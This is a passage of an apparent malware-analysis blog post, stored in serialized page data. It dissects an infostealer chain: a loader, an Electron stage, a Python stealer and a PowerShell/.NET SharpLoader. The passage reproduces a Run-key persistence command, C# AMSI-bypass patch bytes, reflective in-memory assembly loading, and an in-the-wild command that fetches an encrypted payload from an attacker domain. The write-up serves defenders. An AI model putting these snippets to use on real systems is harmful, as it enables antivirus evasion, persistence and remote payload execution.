modules, all targeting sensitive data sources:",[353,14576,14577],{},[433,14578,14579],{},"Core Capabilities",[367,14581,14582,14588,14598,14608],{},[370,14583,14584,14587],{},[433,14585,14586],{},"Browser Data Extraction",": Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)",[370,14589,14590,14593,14594,14597],{},[433,14591,14592],{},"Token Harvesting",": Collected session tokens, particularly from ",[433,14595,14596],{},"Discord",", and scanned for cryptocurrency wallet extensions",[370,14599,14600,14603,14604,14607],{},[433,14601,14602],{},"Data Packaging",": Aggregated all harvested data into a structured ",[433,14605,14606],{},"ZIP archive",", preserving directory and file context for attacker-side parsing",[370,14609,14610,14613],{},[433,14611,14612],{},"Exfiltration",": Uploaded the resulting archive to public APIs and infrastructure.",[353,14615,14616],{},[433,14617,14245],{},[353,14619,14620],{},"The entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.",[353,14622,14623],{},"The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in with routine internet activity.",[353,14625,14626,14627,14629],{},"This stage ultimately confirmed the malware’s identity: a variant of ",[433,14628,13939],{},", known for its:",[367,14631,14632,14635,14638,14641],{},[370,14633,14634],{},"High modularity",[370,14636,14637],{},"Runtime obfuscation",[370,14639,14640],{},"Commercial distribution via Telegram",[370,14642,14643],{},"Strong focus on credential harvesting and token-based session hijacking",[353,14645,14646,14647,14649],{},"Together with the earlier stages, ",[3724,14648,13878],{}," formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.",[13828,14651,14653,14654],{"id":14652},"_3-deep-dive-updaterexe","3. Deep Dive: ",[3724,14655,13870],{},[353,14657,9352],{},[353,14659,14660,14662],{},[3724,14661,13870],{}," was the initial binary observed during post-compromise analysis. Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.",[2548,14664,14666],{"id":14665},"_31-properties","3.1 Properties",[353,14668,10713],{},[8921,14670,14671,14680],{},[11807,14672,14673],{},[8928,14674,14675,14678],{},[8932,14676,14677],{},"Property",[8932,14679,7439],{},[8925,14681,14682,14692,14702,14712,14722,14731],{},[8928,14683,14684,14689],{},[8948,14685,14686],{},[433,14687,14688],{},"Format:",[8948,14690,14691],{},"Windows Portable Executable (PE32)",[8928,14693,14694,14699],{},[8948,14695,14696],{},[433,14697,14698],{},"Architecture:",[8948,14700,14701],{},"x86-64",[8928,14703,14704,14709],{},[8948,14705,14706],{},[433,14707,14708],{},"Size:",[8948,14710,14711],{},"~154 KB",[8928,14713,14714,14719],{},[8948,14715,14716],{},[433,14717,14718],{},"Entropy:",[8948,14720,14721],{},"Normal (non-packed)",[8928,14723,14724,14729],{},[8948,14725,14726],{},[433,14727,14728],{},"Signatures:",[8948,14730,8974],{},[8928,14732,14733,14738],{},[8948,14734,14735],{},[433,14736,14737],{},"VirusTotal Detection:",[8948,14739,14740],{},"1/69 at time of analysis",[353,14742,14743],{},"The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.",[2548,14745,14747],{"id":14746},"_32-behavioral-analysis","3.2 Behavioral Analysis",[353,14749,10713],{},[353,14751,14752],{},[433,14753,14754],{},"No User Interaction Required",[353,14756,14757,14758,14760],{},"The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (",[3724,14759,13870],{},") was launched automatically — most likely via a persistence mechanism such as a registry autorun key. However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.",[353,14762,14763],{},[433,14764,14765],{},"Silent Execution and Staging",[353,14767,14768,14769,14771,14772,14774],{},"Upon execution, ",[3724,14770,13870],{}," immediately launched ",[3724,14773,13874],{}," with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.",[353,14776,14777],{},[433,14778,14779],{},"Payload Deployment Behavior",[353,14781,14782,14784],{},[3724,14783,13874],{}," was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:",[367,14786,14787,14793],{},[370,14788,14789,14790,14792],{},"The payload may have been bundled internally within ",[3724,14791,13870],{}," (e.g., embedded resource), or",[370,14794,14795],{},"It may have been retrieved from a remote source",[353,14797,14798],{},"Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.",[353,14800,14801],{},[433,14802,14803],{},"Process Chain Behavior",[353,14805,14806,14807,14809,14810,14812],{},"Once executed, ",[3724,14808,13870],{}," spawned ",[3724,14811,13874],{}," as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:",[3102,14814,14817],{"className":14815,"code":14816,"language":3722},[3720],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[3724,14818,14816],{"__ignoreMap":402},[353,14820,14821],{},"All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths. This minimized exposure and helped the malware remain undetected over an extended period.",[2548,14823,14825],{"id":14824},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[353,14827,10713],{},[353,14829,14830,14832,14833,14836,14837,456],{},[3724,14831,13870],{}," played a ",[433,14834,14835],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[3724,14838,13874],{},[353,14840,14841],{},[433,14842,14843],{},"Confirmed Characteristics",[367,14845,14846,14853,14858],{},[370,14847,14848,14849,14852],{},"It ",[433,14850,14851],{},"did not"," contain or execute malicious logic directly",[370,14854,14848,14855,14857],{},[433,14856,14851],{}," perform any data exfiltration",[370,14859,14848,14860,14862],{},[433,14861,14851],{}," interact with browser credential stores or sensitive user data",[353,14864,14865,14866,14868],{},"Its sole purpose was to silently launch ",[3724,14867,13874],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[353,14870,14871,14872,14874,14875,14877],{},"By acting as an isolated first-stage loader, ",[3724,14873,13870],{}," ensured that the actual stealer payload (",[3724,14876,13878],{},") remained concealed in deeper layers of execution. This separation of duties allowed the attackers to:",[367,14879,14880,14883,14886],{},[370,14881,14882],{},"Avoid correlation by static AV or sandbox systems",[370,14884,14885],{},"Swap or update payloads without modifying the loader",[370,14887,14888],{},"Reduce behavioral signals at the entry point",[353,14890,14891,14892,14895],{},"This pattern is typical in ",[433,14893,14894],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[353,14897,14288,14898,14900],{},[3724,14899,13870],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[2548,14902,14904],{"id":14903},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[353,14906,10713],{},[353,14908,14909,14910,14912],{},"Static analysis of the Python payload revealed that ",[3724,14911,13870],{}," is explicitly persisted using a registry autorun entry:",[367,14914,14915,14923,14931],{},[370,14916,14917,14252,14920],{},[433,14918,14919],{},"Registry Path",[3724,14921,14922],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[370,14924,14925,14252,14928],{},[433,14926,14927],{},"Value Name",[3724,14929,14930],{},"Realtek Audio",[370,14932,14933,14252,14936],{},[433,14934,14935],{},"Payload Path",[3724,14937,14938],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[353,14940,14941],{},"The corresponding registry command is executed via PowerShell:",[3102,14943,14947],{"className":14944,"code":14945,"language":14946,"meta":402,"style":402},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[3724,14948,14949],{"__ignoreMap":402},[7258,14950,14953],{"class":14951,"line":14952},"line",1,[7258,14954,14945],{},[353,14956,14957],{},"This ensures the malware is launched at every user login. The file is also marked with hidden and system attributes to further evade detection:",[3102,14959,14961],{"className":14944,"code":14960,"language":14946,"meta":402,"style":402},"attrib +h +s \"Updater.exe\"\n",[3724,14962,14963],{"__ignoreMap":402},[7258,14964,14965],{"class":14951,"line":14952},[7258,14966,14960],{},[353,14968,14969],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[2548,14971,14973],{"id":14972},"_35-summary","3.5 Summary",[353,14975,10713],{},[2179,14977,14978],{},[353,14979,14980,14981,14983],{},"While ",[3724,14982,13870],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[2559,14985],{"className":14986},[14110],[353,14988,14989],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[353,14991,14992,14993,14995,14996,14998,14999,15002],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[3724,14994,13878],{}," payload, we identified logic that actively checked for the presence of ",[3724,14997,13870],{},". This check was part of a broader ",[433,15000,15001],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[353,15004,15005,15006,15008,15009,15012],{},"This means that ",[3724,15007,13870],{}," was not only responsible for initiating the malware, but also formed part of its ",[433,15010,15011],{},"ongoing runtime validation",". Without this stub, the malware could lose its ability to reinitialize in future sessions.",[353,15014,15015],{},[433,15016,15017,15018,14452],{},"Key Functions of ",[3724,15019,13870],{},[367,15021,15022,15027,15032,15035],{},[370,15023,15024,15025],{},"Seamless deployment of ",[3724,15026,13874],{},[370,15028,15029,15030],{},"Indirect execution of ",[3724,15031,13878],{},[370,15033,15034],{},"Decoupling of loader and payload logic",[370,15036,15037,15040],{},[433,15038,15039],{},"Referenced by the payload itself"," as part of operational health monitoring",[353,15042,15043],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[353,15045,15046,15047,15049],{},"For now, it is clear that ",[3724,15048,13870],{}," served as both ignition and anchor point in this layered infostealer architecture.",[2548,15051,15053],{"id":15052},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[353,15055,10713],{},[353,15057,15058],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[353,15060,15061,15062,15064,15065,15067],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[3724,15063,13870],{}," was present and executing, but ",[3724,15066,13874],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[353,15069,15070,15071,15076,15077,15079],{},"We deliberately ",[433,15072,15073,15074],{},"deleted ",[3724,15075,13874],{}," from the infected environment while leaving ",[3724,15078,13870],{}," untouched. And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[353,15081,15082,15083,2454,15085,15087,15088,15091,15092,15095,15096,2454,15098,15101,15102,15104],{},"Here’s where it got interesting: Instead of directly recreating ",[3724,15084,13874],{},[3724,15086,13870],{}," first dropped a file named ",[3724,15089,15090],{},"app-64.7z"," — a standard ",[433,15093,15094],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[3724,15097,13874],{},[3724,15099,15100],{},"resources",", and the ",[3724,15103,14326],{}," payload with all embedded logic.",[353,15106,15107,15108,456],{},"We had effectively ",[433,15109,15110],{},"forced the malware to hand us the source package",[353,15112,15113],{},[356,15114],{"alt":15115,"src":15116},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[353,15118,15119],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[353,15121,15122,15123,15126],{},"This behavior strongly suggests that the attackers deliberately chose a ",[433,15124,15125],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[353,15128,15129],{},"And in our case? It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[353,15131,15132,15133],{},"Let’s just say: ",[433,15134,15135,15136,2454,15139,15142],{},"sometimes the best forensic tools are ",[3724,15137,15138],{},"del",[3724,15140,15141],{},"wait",", and a little curiosity.",[13828,15144,15146,15147],{"id":15145},"_4-deep-dive-powbat","4. Deep Dive: ",[3724,15148,15149],{},"pow.bat",[353,15151,9352],{},[353,15153,15154,15155,15158],{},"In the analyzed malware campaign, the component ",[3724,15156,15157],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[2548,15160,15162],{"id":15161},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[353,15164,10713],{},[353,15166,15167,15168,15170],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[3724,15169,15149],{}," shows the following characteristics based on static analysis:",[8921,15172,15173,15181],{},[11807,15174,15175],{},[8928,15176,15177,15179],{},[8932,15178,14677],{},[8932,15180,7439],{},[8925,15182,15183,15192,15201,15211,15220,15230,15240,15249],{},[8928,15184,15185,15189],{},[8948,15186,15187],{},[433,15188,14688],{},[8948,15190,15191],{},"DOS Batch File",[8928,15193,15194,15198],{},[8948,15195,15196],{},[433,15197,14698],{},[8948,15199,15200],{},"Script-based (not compiled binary)",[8928,15202,15203,15208],{},[8948,15204,15205],{},[433,15206,15207],{},"File Size:",[8948,15209,15210],{},"27.79 KB (28454 bytes)",[8928,15212,15213,15217],{},[8948,15214,15215],{},[433,15216,14718],{},[8948,15218,15219],{},"Normal (plain ASCII text)",[8928,15221,15222,15227],{},[8948,15223,15224],{},[433,15225,15226],{},"Magic:",[8948,15228,15229],{},"DOS batch file, ASCII text",[8928,15231,15232,15237],{},[8948,15233,15234],{},[433,15235,15236],{},"Digital Signature:",[8948,15238,15239],{},"None detected",[8928,15241,15242,15246],{},[8948,15243,15244],{},[433,15245,14737],{},[8948,15247,15248],{},"26 / 61 (at time of analysis)",[8928,15250,15251,15256],{},[8948,15252,15253],{},[433,15254,15255],{},"Threat Labels:",[8948,15257,15258,2454,15261,2454,15264,2454,15266],{},[3724,15259,15260],{},"trojan",[3724,15262,15263],{},"downloader",[3724,15265,14946],{},[3724,15267,15268],{},"agentb",[353,15270,15271,15272,15275],{},"Despite being a simple ",[3724,15273,15274],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[2548,15277,15279,15280,8133],{"id":15278},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[3724,15281,15282],{},"gofor4msi",[353,15284,10713],{},[353,15286,15287],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[353,15289,15290,15291,15294,15295,15298,15299,15302,15303,15306,15307,12376],{},"In SharpLoader, the AMSI bypass is implemented through ",[433,15292,15293],{},"direct in-memory patching"," of the ",[3724,15296,15297],{},"AmsiScanBuffer"," function within the ",[3724,15300,15301],{},"amsi.dll",". This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[3724,15304,15305],{},"AMSI_RESULT_DETECTED",") or safe (",[3724,15308,15309],{},"AMSI_RESULT_CLEAN",[353,15311,15312],{},"The relevant in-memory patching code is:",[3102,15314,15318],{"className":15315,"code":15316,"language":15317,"meta":402,"style":402},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[3724,15319,15320,15325,15330,15335],{"__ignoreMap":402},[7258,15321,15322],{"class":14951,"line":14952},[7258,15323,15324],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[7258,15326,15327],{"class":14951,"line":403},[7258,15328,15329],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[7258,15331,15332],{"class":14951,"line":704},[7258,15333,15334],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[7258,15336,15338],{"class":14951,"line":15337},4,[7258,15339,15340],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[353,15342,15343],{},"This sequence performs the following steps:",[5026,15345,15346,15355,15366,15376],{},[370,15347,15348,15351,15352,456],{},[433,15349,15350],{},"Load the AMSI DLL"," into the process using ",[3724,15353,15354],{},"LoadLibrary(\"amsi.dll\")",[370,15356,15357,15360,15361,13879,15363,456],{},[433,15358,15359],{},"Resolve the memory address"," of the function ",[3724,15362,15297],{},[3724,15364,15365],{},"GetProcAddress()",[370,15367,15368,15371,15372,15375],{},[433,15369,15370],{},"Change the memory protection"," of the address using ",[3724,15373,15374],{},"VirtualProtect()"," to make it writable.",[370,15377,15378,15381,15382,15385],{},[433,15379,15380],{},"Overwrite the beginning of the function"," using ",[3724,15383,15384],{},"Marshal.Copy()"," with a small shellcode patch.",[353,15387,15388],{},"The patch applied for 64-bit systems is:",[3102,15390,15392],{"className":15315,"code":15391,"language":15317,"meta":402,"style":402},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[3724,15393,15394],{"__ignoreMap":402},[7258,15395,15396],{"class":14951,"line":14952},[7258,15397,15391],{},[353,15399,15400],{},"This corresponds to the following instructions:",[367,15402,15403,15412],{},[370,15404,15405,15408,15409],{},[3724,15406,15407],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[3724,15410,15411],{},"E_INVALIDARG",[370,15413,15414,15417],{},[3724,15415,15416],{},"ret"," → immediately returns from the function",[353,15419,15420,15421,15423],{},"This effectively causes ",[3724,15422,15297],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[353,15425,15426],{},"If executed on a 32-bit system, a different patch is applied:",[3102,15428,15430],{"className":15315,"code":15429,"language":15317,"meta":402,"style":402},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[3724,15431,15432],{"__ignoreMap":402},[7258,15433,15434],{"class":14951,"line":14952},[7258,15435,15429],{},[353,15437,15438],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[353,15440,15441,15442,2454,15445,15448,15449,15452],{},"Using raw P/Invoke calls like ",[3724,15443,15444],{},"LoadLibrary",[3724,15446,15447],{},"GetProcAddress",", and ",[3724,15450,15451],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. This method is compact, effective, and leaves minimal forensic artifacts.",[353,15454,15455,15456,15459],{},"In summary, this AMSI bypass technique is a ",[433,15457,15458],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[2548,15461,15463],{"id":15462},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[353,15465,10713],{},[353,15467,15468,15469,15472],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[3724,15470,15471],{},"$location"," parameter.",[353,15474,15475,15476,15479,15480,15483,15484,15487,15488,15491,15492,15495],{},"If the location begins with ",[3724,15477,15478],{},"http",", it is interpreted as a URL and the loader uses ",[3724,15481,15482],{},"Get_Stage2()"," to download the payload via ",[3724,15485,15486],{},"HttpWebRequest",". If it is a local path, ",[3724,15489,15490],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[433,15493,15494],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[353,15497,15498,15499,15502],{},"The loader then performs a ",[433,15500,15501],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[5026,15504,15505,15511,15521,15531],{},[370,15506,15507,15510],{},[433,15508,15509],{},"Base64 Decoding",": Converts the encoded string into raw bytes. This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[370,15512,15513,15516,15517,15520],{},[433,15514,15515],{},"GZip Decompression",": The decoded bytes are passed to a ",[3724,15518,15519],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[370,15522,15523,15526,15527,15530],{},[433,15524,15525],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[3724,15528,15529],{},"Rfc2898DeriveBytes",") and a static salt.",[370,15532,15533,15536],{},[433,15534,15535],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[353,15538,15539],{},"The decryption pipeline is executed like so:",[3102,15541,15543],{"className":15315,"code":15542,"language":15317,"meta":402,"style":402},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[3724,15544,15545,15550],{"__ignoreMap":402},[7258,15546,15547],{"class":14951,"line":14952},[7258,15548,15549],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[7258,15551,15552],{"class":14951,"line":403},[7258,15553,15554],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[353,15556,15557,15558,15561],{},"Here, ",[3724,15559,15560],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[353,15563,15564],{},[433,15565,15566],{},"Key Design Observations:",[367,15568,15569,15572,15575],{},[370,15570,15571],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the password non-trivial.",[370,15573,15574],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[370,15576,15577],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[353,15579,15580],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. Without either live execution or deep inspection of the loader behavior, defenders are unlikely to uncover the embedded payload without also knowing the password and exact decoding logic.",[2548,15582,15584],{"id":15583},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[353,15586,10713],{},[353,15588,15589],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[3102,15591,15593],{"className":15315,"code":15592,"language":15317,"meta":402,"style":402},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[3724,15594,15595,15600],{"__ignoreMap":402},[7258,15596,15597],{"class":14951,"line":14952},[7258,15598,15599],{},"Assembly a = Assembly.Load(bin);\n",[7258,15601,15602],{"class":14951,"line":403},[7258,15603,15604],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[353,15606,15607,15608,15611],{},"This technique is referred to as ",[433,15609,15610],{},"fileless execution",". It is highly evasive because it:",[367,15613,15614,15617,15620],{},[370,15615,15616],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[370,15618,15619],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[370,15621,15622],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[353,15624,15625,15626,15629,15630,15633],{},"If the ",[3724,15627,15628],{},"EntryPoint"," is not ",[3724,15631,15632],{},"static",", the loader includes a fallback logic:",[3102,15635,15637],{"className":15315,"code":15636,"language":15317,"meta":402,"style":402},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[3724,15638,15639,15644,15649,15654,15659,15664],{"__ignoreMap":402},[7258,15640,15641],{"class":14951,"line":14952},[7258,15642,15643],{},"MethodInfo method = a.EntryPoint;\n",[7258,15645,15646],{"class":14951,"line":403},[7258,15647,15648],{},"if (method != null)\n",[7258,15650,15651],{"class":14951,"line":704},[7258,15652,15653],{},"{\n",[7258,15655,15656],{"class":14951,"line":15337},[7258,15657,15658],{},"    object o = a.CreateInstance(method.Name);\n",[7258,15660,15661],{"class":14951,"line":13492},[7258,15662,15663],{},"    method.Invoke(o, null);\n",[7258,15665,15667],{"class":14951,"line":15666},6,[7258,15668,15669],{},"}\n",[353,15671,15672,15673,15676],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[3724,15674,15675],{},"public int Main()"," inside a class instance). The code dynamically creates an instance of the class and then calls the entry point method.",[353,15678,15679],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[2548,15681,15683],{"id":15682},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[353,15685,10713],{},[353,15687,15688,15689,15691],{},"The PowerShell function ",[3724,15690,15157],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[353,15693,15694],{},[433,15695,15696],{},"Supported Parameters:",[367,15698,15699,15705,15711,15731],{},[370,15700,15701,15704],{},[3724,15702,15703],{},"-location"," (mandatory): Specifies either a URL or a local file path to the stage two encrypted payload.",[370,15706,15707,15710],{},[3724,15708,15709],{},"-password"," (mandatory): Used to derive the AES decryption key.",[370,15712,15713,2454,15716,2454,15719,15722,15723,15726,15727,15730],{},[3724,15714,15715],{},"-argument",[3724,15717,15718],{},"-argument2",[3724,15720,15721],{},"-argument3"," (optional): These are forwarded directly to the ",[3724,15724,15725],{},".NET"," assembly’s ",[3724,15728,15729],{},"Main()"," method via reflection.",[370,15732,15733,15736],{},[3724,15734,15735],{},"-noArgs",": Triggers execution without passing any parameters to the second-stage payload.",[353,15738,15739],{},"Internally, the arguments are collected and forwarded like this:",[3102,15741,15743],{"className":14944,"code":15742,"language":14946,"meta":402,"style":402},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[3724,15744,15745,15750],{"__ignoreMap":402},[7258,15746,15747],{"class":14951,"line":14952},[7258,15748,15749],{},"object[] cmd = args.Skip(2).ToArray();\n",[7258,15751,15752],{"class":14951,"line":403},[7258,15753,15754],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[353,15756,15757],{},"This means that the .NET payload is expected to have a signature like:",[3102,15759,15761],{"className":15315,"code":15760,"language":15317,"meta":402,"style":402},"static void Main(string[] args)\n",[3724,15762,15763],{"__ignoreMap":402},[7258,15764,15765],{"class":14951,"line":14952},[7258,15766,15760],{},[353,15768,15769,15770,15772],{},"or it will gracefully fall back to the parameterless ",[3724,15771,15729],{}," variant via fallback logic. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[353,15774,15775],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[2548,15777,15779],{"id":15778},"_46-real-world-usage-example","4.6 Real-World Usage Example",[353,15781,10713],{},[353,15783,15784],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[3102,15786,15788],{"className":14944,"code":15787,"language":14946,"meta":402,"style":402},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[3724,15789,15790],{"__ignoreMap":402},[7258,15791,15792],{"class":14951,"line":14952},[7258,15793,15787],{},[353,15795,15796],{},"This example highlights the typical use case of SharpLoader:",[367,15798,15799,15813,15825,15835],{},[370,15800,15801,15804,15805,15808,15809,15812],{},[433,15802,15803],{},"Location Argument",": The URL points to a remote server hosting ",[3724,15806,15807],{},"calc.enc",", a concealed second-stage payload. The endpoint is located under a legitimate-looking ",[3724,15810,15811],{},".well-known"," directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.",[370,15814,15815,14252,15818,15820,15821,15824],{},[433,15816,15817],{},"Payload Characteristics",[3724,15819,15807],{}," is a ",[433,15822,15823],{},"triple-obfuscated file"," — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.",[370,15826,15827,15830,15831,15834],{},[433,15828,15829],{},"Password Argument",": The string ",[3724,15832,15833],{},"UwUFufu1"," is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.",[370,15836,15837,15840,15841,15843],{},[433,15838,15839],{},"No Additional Arguments",": The ",[3724,15842,15735],{}," switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.",[353,15845,15846,15847,15850],{},"This stealthy invocation chain encapsulates SharpLoader’s core purpose: ",[433,15848,15849],{},"fileless, adaptive, and secure payload delivery"," through simple PowerShell syntax with maximum obfuscation and evasion.",[2548,15852,15854],{"id":15853},"_47-summary","4.7 Summary",[353,15856,10713],{},[353,15858,15859,15860,15862],{},"The 